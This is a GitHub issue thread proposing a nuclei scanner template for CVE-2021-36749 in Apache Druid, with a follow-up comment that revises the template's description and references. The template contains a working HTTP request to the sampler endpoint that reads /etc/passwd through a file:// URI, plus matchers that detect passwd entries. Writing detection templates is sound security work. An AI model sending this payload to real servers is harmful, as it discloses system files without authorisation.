### ISSUE TITLE
[nuclei-template] CVE-2021-36749

### ISSUE THREAD

**Issue by 0xf4n9x** [projectdiscovery/nuclei-templates#2892]
**Template Details**

```yaml
id: CVE-2021-36749

info:
  name: Apache Druid Authentication Bypass Restrictions
  author: _0xf4n9x_
  severity: medium
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
    - https://www.cvedetails.com/cve/CVE-2021-36749/
    - https://github.com/BrucessKING/CVE-2021-36749
  description: |
    In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
  tags: cve,cve2021,apache,rce
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 6.5
    cve-id: CVE-2021-36749
    cwe-id: CWE-668

requests:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "druid:*:1000:1000:"
```

**Comment by FanqXu** [comment]
Hello, @ehsandeep. I refer to the description of [CVE-2021-36749](https://www.cvedetails.com/cve/CVE-2021-36749/) on the cvedetails website.
![CVE-2021-36749](https://user-images.githubusercontent.com/40891670/137419525-4c0eb738-f5a3-45fa-a5b1-feb45d5243df.png)
The following changes have been made:
```yaml
info:
  name: Apache Druid Authentication Bypass Restrictions
...
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
    - https://www.cvedetails.com/cve/CVE-2021-36749/
    - https://github.com/BrucessKING/CVE-2021-36749
...
```
